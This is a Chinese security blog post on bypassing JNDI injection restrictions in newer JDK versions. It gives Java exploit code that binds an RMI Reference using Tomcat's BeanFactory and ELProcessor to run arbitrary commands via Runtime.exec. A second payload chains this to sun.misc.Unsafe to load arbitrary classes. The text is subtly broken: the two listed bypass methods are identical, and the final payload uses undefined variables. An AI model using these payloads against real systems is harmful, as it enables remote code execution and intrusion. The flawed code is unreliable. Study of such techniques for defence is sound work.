高版本JDK下绕过受限JNDI注入进行任意类加载

已于 2022-07-18 14:28:41 修改
阅读量1.1k 收藏 1
点赞数
文章标签: 网络安全 web安全
于 2022-07-18 11:30:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40466372/article/details/125844807
版权

JNDI注入

1.高版本限制

(1)从JDK 6u45、7u21开始,java.rmi.server.useCodebaseOnly 的默认值就是true。当该值为true时,将禁用自动加载远程类文件,仅从CLASSPATH和当前VM的java.rmi.server.codebase 指定路径加载类文件。
(2)在JDK 6u132, JDK 7u122, JDK 8u113 中Java提升了JNDI 限制了Naming/Directory服务中JNDI Reference远程加载Object Factory类的特性。系统属性 com.sun.jndi.rmi.object.trustURLCodebase、com.sun.jndi.cosnaming.object.trustURLCodebase 的默认值变为false,即默认不允许从远程的Codebase加载Reference工厂类。
(3)Oracle JDK 11.0.1、8u191、7u201、6u211之后 com.sun.jndi.ldap.object.trustURLCodebase 属性的默认值被调整为false,同样禁止了ldap加载远程类。

2.高版本绕过

对于Oracle JDK 11.0.1、8u191、7u201、6u211或者更高版本的JDK来说,已经无法直接使用rmi和ldap来加载远程的恶意类了,但是我们可以寻求别的方法进行绕过,绕过的方法如下:
(1)找到一个受害者本地CLASSPATH中的类作为恶意的Reference Factory工厂类,并利用这个本地的Factory类执行命令。
(2)找到一个受害者本地CLASSPATH中的类作为恶意的Reference Factory工厂类,并利用这个本地的Factory类执行命令。
这两种方法对被攻击者的本地环境要求较高,需要利用被攻击者的本地Gadget。
绕过方式参考:
https://paper.seebug.org/942/#classreference-factory

3.利用本地Class作为Reference Factory

如上述文章所说,虽然高版本JDK无法加载远程恶意类,但是我们可以在返回的Reference中指定被攻击者本地存在的Factory Class。 存在于Tomcat依赖包中的org.apache.naming.factory.BeanFactory 就能很好的被利用,javax.el.ELProcessor可以作为目标Class。Reference构造如下:

Registry registry = LocateRegistry.createRegistry(rmi_port);
// 实例化Reference,指定目标类为javax.el.ELProcessor,工厂类为org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
// 强制将 'x' 属性的setter 从 'setX' 变为 'eval', 详细逻辑见 BeanFactory.getObjectInstance 代码
ref.add(new StringRefAddr("forceString", "x=eval"));
// 利用表达式执行命令
ref.add(new StringRefAddr("x", String.format(
               "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(" +
                        "\"java.lang.Runtime.getRuntime().exec('%s')\"" +
                        ")",
                cmd
        )));

ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
registry.bind("Exploit", referenceWrapper);

"forceString"可以给属性强制指定一个setter方法,这里我们将属性"x"的setter方法设置为 ELProcessor.eval() 方法。ELProcessor.eval()会对EL表达式进行求值,最终达到命令执行的效果。

高版本JDK下使用Unsafe加载任意类

1.高版本限制

在JDK8中,攻击者常用当前线程的contextClassLoader去反射调用defineClass方法来进行恶意类的加载,但在JDK9之后,默认不允许访问封装的包和深度反射其他模块,这导致使用直接使用defineClass会抛出警告不让调用。

2.高版本绕过

sun.misc.Unsafe在调用时不受上述限制,unsafe类中的defineAnonymousClass方法可以加载一个内部匿名类,在defineAnonymousClass中再使用defineClass将不会被拦截,此时使用defineClass便可以加载任意类。
Unsafe使用方法参考:
https://blog.csdn.net/qq_40466372/article/details/125645985

高版本JDK下JNDI与Unsafe配合使用

如上文所述,我们可以利用JNDI指定BeanFactory ,使用javax.el.ELProcessor类的eval方法执行任意命令,此时我们将执行的命令换成调用sun.misc.Unsafe的defineAnonymousClass方法,即可实现高版本JDK下的远程加载任意类。
最终利用方式:

Registry registry = LocateRegistry.createRegistry(rmi_port);
// 实例化Reference,指定目标类为javax.el.ELProcessor,工厂类为org.apache.naming.factory.BeanFactory
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
// 强制将 'x' 属性的setter 从 'setX' 变为 'eval', 详细逻辑见 BeanFactory.getObjectInstance 代码
ref.add(new StringRefAddr("forceString", "x=eval"));
// 利用表达式执行命令
ref.add(new StringRefAddr("x", 
                "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(" +
                        "\"Class<?> safeClass=java.lang.Class.forName('sun.misc.Unsafe');"+
                        "Field safeCon=safeClass.getDeclaredField('theUnsafe');"+
                        "safeCon.setAccessible(true);"+
                        "Class mem=unSafe.defineAnonymousClass(java.io.File.class,ClassBytes,null);"+
                        "mem.newInstance();\"" +
                        ")"));

Reference

https://paper.seebug.org/942/#classreference-factory
https://cn-sec.com/archives/797437.html

月入一千八,每天笑哈哈
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[Java安全]JDK8u191之后的JNDI注入绕过(javax.el.ELProcessor依赖)
Y4tacker的博客
10-13 2474
文章目录环境Maven依赖利用分析低版本流程分析JDK8u191之后的JNDI注入绕过参考文章 环境 我们知道在JDK 6u211、7u201、8u191、11.0.1之后,增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了 切换到8u191之后就好了,我这里随便选择了8u201 Maven依赖 <dependency> <groupId&
linux系统下64位jdk1.6,linux系统下64位java6 jdk-6u45-linux-x64.bin
hatzhou的专栏
07-10 2456
很多人要在linux系统下部署java应用,但是jdk找起来很麻烦,csdn下载也需要积分。 我这里分享一个吧 》》点击下载《《 解压密码:123456 是网盘上的文件,会有一个广告页面,关掉就行,下载速度还是很快的。 如果需要更多资源,可以到这里  www.ctfile.cn...
JDK版本JNDI注入绕过
最新发布
wfz2333的博客
05-22 1150
只启用RMI服务时,这时候RMI客户端能够去打服务端,有两种情况,第一种就是利用服务端本地的gadget,具体要看服务端pom.xml文件比如yso中yso工具中已经集合了很多gadget chain本地利用yso的打rmi注册表的模块 此时在jdk1.7.0_21和jdk1.7.0_25以及jdk1.8.0上都可以成功,然而在一次攻击内网rmi服务的深思这篇文章中说到jdk8u121以后进行了一定的限制 jdk1.8.0_121测试如下:这种防御机制即JEP290,在jdk8u121提出的,简单来说就
JNDI注入解析
gental_z的博客
01-04 7683
一、什么是JNDIJNDI全称为Java命名和目录接口。我们可以理解为JNDI提供了两个服务,即命名服务和目录服务。 ​ 命名服务将一个对象和一个名称进行绑定,然后放置到一个容器里面。当我们想要获取这个对象的时候,就可以通过容器来查找这个名称,从而获得这个对象。 ​ 目录服务就是将一些对象的属性放置到容器中,然后想要操作这个属性的时候,就通过容器来进行查找。 ​ 对比一下命名服务和目录服务,其实命名服务就是绑定对象,而目录服务就是绑定了对象的属性。在JNDI中,命名服务和目录服务是一起结合提供的,最容
JNDI注入版本绕过学习
why811的博客
09-06 221
JNDI(Java Naming and Directory Interface)是一个应用程序设计的 API,一种标准的 Java 命名系统接口。JNDI 提供统一的客户端 API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将 JNDI API 映射为特定的命名服务和目录系统,使得 Java 应用程序可以和这些命名服务和目录服务之间进行交互。
JNDI注入+版本绕过+工具使用
GalaxySpaceX的博客
06-21 2490
JNDI注入+版本绕过+工具使用
命令注入_JNDI注入远程命令执行
weixin_34897593的博客
01-08 3819
在2016年的BlackHat上,@pwntester分享了通过JNDI注入进行RCE利用的方法。JNDI注入利用方式比较简单。我们先看一下poc代码。首先在攻击机上部署恶意代码exp.class。exp.class放在http://127.0.0.1:8001/目录下,所以攻击机需要开启http服务和rmi服务。import java.io.IOException;import jav...
探索版本 JDKJNDI 漏洞的利用方法 - 跳跳糖1
08-03
探索版本 JDKJNDI 漏洞的利用方法 - 跳跳糖1
类加载机制与JDK调优命令.pdf
05-30
类的加载机制与jdk的调优命令 https://blog.csdn.net/weixin_41632508
Mac版本JDK6,最支持macOS Catalina10.15.1
12-13
Mac系统下已安装版本JDK的情况下,下载该版本可支持安装,并且系统最支持macOS Catalina10.15.1。
Linux安装多个jdk版本进行切换
01-20
本文为大家分享了Linux jdk安装多个版本切换的具体方法,供大家参考,具体内容如下 1. 上传jdk7 和 jdk8 包 2. 解压 [root@localhost webapps]# tar -zxvf /package/jdk-7u80-linux-x64.tar.gz 3. 配置jdk变量  ...
java项目jar包与jdk版本不兼容的问题解决
08-25
当一个使用了更版本JDK编译的jar包在低版本JDK环境下运行时,就会出现“Unsupported major.minor version”错误,这是因为低版本JDK无法识别新版本的字节码格式。 例如,在给定的描述中提到的错误“Unsupported ...
Java rmi-codebase记录
AsagiRiAsagi的博客
03-16 570
不得不承认能学会这么多利用姿势全靠站在巨人的肩膀上8u191后的JNDI注入利用:这篇文章介绍的RMI攻击方法在低版本比较适用搞懂RMI、JRMP、JNDI-终结篇:三梦师傅的文章,更侧重代码调试和RMI的原理,写文章的思路也是针对JNDI利用,按照不同jdk版本介绍相应的攻击手法。Java RMI远程利用分析:长亭师傅写的文章,主要在死磕rmi服务这块给了不少思路,缺点是代码和命令贴的不是很全一次攻击内网rmi服务的深思bsmali4师傅写的,关于如何绕JEP290写的相当详细。
linux系统下(x86_64)安装jdk 1.6(jdk-6u45-linux-x64.bin)
热门推荐
谢彬のCSDN专栏
11-04 11万+
下载安装文件: http://www.oracle.com/technetwork/java/javasebusiness/downloads/java-archive-downloads-javase6-419409.html#jdk-6u21-oth-JPR 【找到这个地址真心很辛苦,自己给自己dian'ge'zan】
【Java代码审计】JNDI+RMI绕过版本JDK的限制
大河之犬的博客
03-08 948
传入的 Reference为 ResourceRef 类,后面通过反射的方式实例化 Reference 所指向的任意 Bean Class,调用 setter 方法为所有的属性赋值,该 Bean Class 的类名、属性、属性值,全都来自于 Reference 对象。因此,实际上我们可以调用任意指定类的任意方法,并指定单个可控的参数。因此,我们实际上可以指定一个存在于目标 classpath 中的工厂类名称,交由这个工厂类去实例化实际的目标类(即引用所指向的类),从而间接实现一定的代码控制。
[Java安全]—JNDI注入
Sentiment的博客
07-08 2630
文章首发于Secin:浅析JNDI注入其实应该先学JNDI再学fastjson的,但是JNDI投稿去了,所以就先发了fastjsonTrail: Java Naming and Directory Interface (The Java™ Tutorials) (oracle.com)The JNDI Tutorial (oracle.com)JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用
Java代码审计——RMI基础利用
王嘟嘟的博客
12-23 2093
可以先看。
操作手册(1)JDK的安装与配置
zhanglao33的博客
08-27 626
[TOC] 1 JDK的安装与配置 1.1 背景 JDK(Java SE Development Kit)是 Java 语言开发工具包的简称,是开发和运行 Java 程序的基础环境。 更多描述 | 百度百科: → 点这里 ← 1.2 版本 目前 Java SE 8u144 是 JDK 8 的最新版本。在工作中的开发框架一般使用 JDK1.6,更有一些维护项目还在使用 JDK1.4
低版本jdk调用jdk
09-09
您好!对于低版本JDK 调用版本JDK,通常会遇到一些兼容性问题。在 Java 中,版本JDK 可能会引入新的语法、类、方法等,而低版本JDK 不具备这些功能,因此无法直接调用。 如果您需要使用版本 JDK 的特性,一种常见的做法是将代码编译为低版本的字节码,然后在版本JDK 上运行。这可以通过在编译时指定目标字节码版本来实现。例如,您可以使用 `-target` 参数来指定所需的低版本 JDK: ``` javac -source 1.x -target 1.x YourClass.java ``` 其中,`1.x` 是您希望代码兼容的目标 JDK 版本。请将 `YourClass.java` 替换为您自己的 Java 源代码文件。 另外,还有一些第三方库或工具可以帮助实现低版本 JDK 调用版本 JDK 的功能,例如 Retrolambda、Byte Buddy 等。这些工具可以通过字节码操作或代理技术来实现低版本 JDK版本 JDK 的调用。 需要注意的是,虽然上述方法可以在某种程度上让低版本 JDK 调用版本 JDK,但仍然可能存在一些兼容性问题和限制。因此,在进行版本转换时,建议仔细测试和验证代码在目标环境中的运行情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值